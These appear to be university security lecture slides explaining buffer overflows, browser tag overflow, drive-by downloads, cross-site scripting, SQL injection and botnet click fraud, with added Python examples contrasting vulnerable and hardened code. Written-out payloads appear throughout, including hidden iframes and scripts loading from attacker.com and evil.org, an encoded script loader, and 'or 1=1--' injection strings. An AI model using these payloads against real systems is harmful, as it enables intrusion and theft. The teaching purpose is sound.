The Same Program (City), a Different Ending. 許富皓, Department of Computer Science and Information Engineering, National Central University. How Fast Could Your Computer Be Compromised? Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP.
How Fast Could Your Computer Be Compromised?
• Based on the observation of an unpatched version of Windows 2000 or Windows XP located within a dial-in network of a German ISP.
• Normally it takes only a couple of minutes before it is successfully compromised.
• On average, the expected lifespan of the honeypot is less than ten minutes.
• After this small amount of time, the honeypot is often successfully exploited by automated malware.
• The shortest compromise time was only a few seconds: once we plugged the network cable in, an SDBot compromised the machine via an exploit against TCP port 135 and installed itself on the machine.
The First Cyber War (Reader's Digest, 2008-12-12)
• Estonia is the most networked country in all of Europe. Last year it suffered an unprecedented cyber attack. Who was behind it, and who will be the next victim?
• The "Stuxnet" super-virus appears: is Iran's nuclear power plant the final target? (2010/09/24 20:15, 鄭杰, compiled report, Chinese Television System)
Principle of Stack Smashing Attacks
• Overwrite control transfer structures, such as return addresses or function pointers, to redirect program execution flow to the desired code.
• Attack strings carry both the code and the address(es) of the code's entry point.
A Linux Process Layout and Stack Operations

    main() { ... G(1); ... }
    void G(int a) { ... H(3); ... }
    void H(int c) { ... }

[Figure: process address space from high to low addresses: kernel address space; env, argv, argc; the stack with frames for main, G and H growing downward; libraries; heap; BSS; data; code, where EIP points.]
Explanation of BOAs (1)

    G(int a) { H(3); add_g: }
    H(int b) { char c[100]; int i=0; while((c[i++]=getch())!=EOF) { } }

[Figure: G's stack frame (parameter b, return address add_g) sits above H's stack frame (saved frame pointer of G at ebp, then c[99] down to c[0], then i, with esp at the bottom). The input string "abc" is stored as c[0]='a' at 0xaba, c[1]='b' at 0xabb, c[2]='c' at 0xabc.]
Explanation of BOAs (2)

Attack string (length = 108 bytes): x...x Injected Code x y 0xabc, where x is 1 byte and y is 4 bytes.

    G(int a) { H(3); add_g: }
    H(int b) { char c[100]; int i=0; while((c[i++]=getch())!=EOF) { } }

[Figure: the 108-byte string fills c[0] (0xaba) through c[99] with x filler and the injected code (entry at 0xabc), the 4 bytes y overwrite the saved frame pointer of G at ebp, and the final 4 bytes overwrite the return address add_g with 0xabc; i and esp lie below c[0].]
Injected Code:
• The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege.
• The injected code is already in machine instruction form; therefore, a CPU can directly execute it.
• However, the above fact also means that the injected code must match the CPU type of the attacked host.
• Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.
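The frame layout on the two "Explanation of BOAs" slides, modelled as an added example (not code from the slides): a 100-byte c[], G's saved frame pointer and the return address add_g, with the slide's unbounded copy loop beside a bounded one. The addresses 0x4000 and 0x5000 and the placeholder bytes for the injected code are constructed stand-ins.

```python
# Model of H()'s frame as drawn on the slides: c[0..99] at the low end, then
# the saved frame pointer of G (4 bytes), then the return address add_g (4 bytes).
BUF_LEN, FP_LEN, RET_LEN = 100, 4, 4
ADD_G = 0x4000      # constructed stand-in for the real return address add_g
SAVED_FP = 0x5000   # constructed stand-in for G's saved frame pointer


def new_frame():
    """Fresh H() frame as one byte array, low addresses first."""
    return (bytearray(BUF_LEN)
            + SAVED_FP.to_bytes(FP_LEN, "little")
            + ADD_G.to_bytes(RET_LEN, "little"))


def read_frame(frame):
    """Return (saved frame pointer, return address) currently in the frame."""
    fp = int.from_bytes(frame[BUF_LEN:BUF_LEN + FP_LEN], "little")
    ret = int.from_bytes(frame[BUF_LEN + FP_LEN:], "little")
    return fp, ret


def copy_unbounded(frame, data):
    """The slide's loop, while((c[i++]=getch())!=EOF), puts no bound on i:
    bytes 100..103 land on the saved frame pointer, bytes 104..107 on add_g."""
    for i, b in enumerate(data):
        frame[i] = b            # only the modelled frame itself is a hard stop
    return frame


def copy_bounded(frame, data):
    """Hardened loop: never store past c[99]; returns the number of bytes refused,
    which the caller should treat as an error rather than silently continue."""
    n = min(len(data), BUF_LEN)
    frame[:n] = data[:n]
    return len(data) - n


def slide_input_layout(injected=b"[CODE]", ret=0xabc):
    """Layout from slide (2): x filler, the injected bytes, one more x (100 bytes
    in total), then 4 bytes y over the frame pointer, then 0xabc over add_g."""
    fill = b"x" * (BUF_LEN - len(injected) - 1)
    return fill + injected + b"x" + b"y" * FP_LEN + ret.to_bytes(RET_LEN, "little")
```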
Memory Address Obfuscation/ASLR - Overview

[Figure: three copies of a process layout side by side, each containing a code segment, data segment, heap segment, libraries and stack segment; the segments appear at a different position in each copy.]
Mishandling Tag Attribute Values (2) [Julam]

    <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    :
    :
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
    :
    CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"> </IFRAME>
Client side

[Figure: a vulnerable browser on the client side talks over the WWW to a good web server and to the malicious web server attacker.com, which serves bad.htm containing:]

    <iframe src="http://attacker.com/bad.htm" height=0 width=0> </iframe>
    <script src=http://attacker.com/bad.js></script>
Client side

[Figure: the same vulnerable browser, good web server and malicious web server attacker.com; bad.htm now carries a URL-encoded script that in turn pulls content from attacker2.com:]

    document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
Through Hyperlinks
• An attacker may be able to embed their malicious code within a hyperlink to the target site. When the client web browser follows the link, the URL sent to trusted.org includes the malicious code. The site (trusted.org) sends a page back to the browser that includes the value of criteria without validating the user-supplied input, which consequently forces the execution of code from the attacker's server.
• For example:

    <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>

• In the attack above, one source is inserting code into pages sent by another source.
• It should be noted that this attack:
  • disguises the link as a link to http://trusted.org,
  • can be easily included in an HTML email message,
  • does not supply the malicious code inline; it is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.

[Figure: the web browser follows the link to trusted.org.]
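What search.cgi on trusted.org receives from the hyperlink above, and the difference between echoing criteria back raw and HTML-encoding it first. This is an added example, not code from the slides; the page template is assumed.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The hyperlink target from the slide, as constructed sample input.
ATTACK_LINK = ("http://trusted.org/search.cgi?criteria="
               "<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>")


def criteria_from_url(url):
    """What search.cgi sees in its 'criteria' query parameter."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("criteria", [""])[0]


def render_vulnerable(criteria):
    """Echoes the parameter straight into the page, as the slide describes:
    the attacker's <SCRIPT> element becomes part of trusted.org's document."""
    return "<p>Results for: " + criteria + "</p>"


def render_escaped(criteria):
    """Hardened: HTML-encode before echoing, so the browser displays the text
    '<SCRIPT ...>' instead of fetching http://evil.org/badkama.js."""
    return "<p>Results for: " + html.escape(criteria, quote=True) + "</p>"


def contains_script_tag(page):
    """Crude check for a live <script> element in rendered output."""
    return "<script" in page.lower()
```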
How Do You Test If It Is Vulnerable?

    hi' or 1=1--
Web Application Input and Its Corresponding SQL Query
• Take an ASP page that will link you to another page with the following URL:

    http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP page might contain the following code:

    v_cat = request("category")
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

    SELECT * FROM product WHERE PCategory='food'

The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.
Why ' or 1=1--?
• Now, assume that we change the URL into something like this:

    http://duck/index.asp?category=food' or 1=1--

Now our variable v_cat equals "food' or 1=1-- ". If we substitute this into the SQL query, we will have:

    SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query should now select everything from the product table, regardless of whether PCategory is equal to 'food' or not.
• A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote (').
• Sometimes it may be possible to replace the double dash with a single hash "#".
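The ASP query above, reproduced in Python as an added example (not the slides' code) with the string-concatenated statement beside a parameterised one. SQLite is used as a stand-in for MS SQL Server because it also treats "--" as a comment to end of line; the product rows are constructed.

```python
import sqlite3

# Constructed product table: two rows in the 'food' category, two outside it.
ROWS = [("apple", "food"), ("bread", "food"), ("hammer", "tool"), ("nails", "tool")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (name TEXT, PCategory TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", ROWS)
    return conn


def search_vulnerable(conn, v_cat):
    """Mirrors the slide's ASP line:
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    The value is pasted into the statement, so a quote in it ends the literal."""
    sqlstr = "SELECT * FROM product WHERE PCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def search_parameterized(conn, v_cat):
    """Same query with a bound parameter: the whole input, quotes, 'or 1=1'
    and '--' included, is compared as one category string and matches nothing."""
    return conn.execute("SELECT * FROM product WHERE PCategory=?", (v_cat,)).fetchall()


def row_counts(v_cat):
    """(rows from the vulnerable query, rows from the parameterised query)."""
    conn = make_db()
    return len(search_vulnerable(conn, v_cat)), len(search_parameterized(conn, v_cat))
```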
DNS Resolution Sequence (2)

[Figure: resolution sequence starting from the root domain server.]
Google AdSense Abuse
• A similar abuse is also possible with Google's AdSense program:
  • AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way.
  • The company earns money due to clicks on these ads, for example per 10,000 clicks in one month.
  • An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increment the click counter.
• This kind of usage for botnets is relatively uncommon, but not a bad idea from an attacker's perspective.
Loss Caused by Click Fraud [Catherine Holahan]
• On average, consultants estimate that between 14% and 15% of clicks are fraudulent.
Ampersands (&'s) in URLs [Liam Quinn]
• Always use &amp; in place of & when writing URLs in HTML:
• E.g.: <a href="foo.cgi?chapter=1&amp;section=2&amp;copy=3&amp;lang=en">...</a>
Click Fraud (2) – Connect to the Google Server Directly
• Attackers could launch the same attacks by
  • opening an HTTP connection to a Google server and
  • sending the URL in the previous slide directly to that server.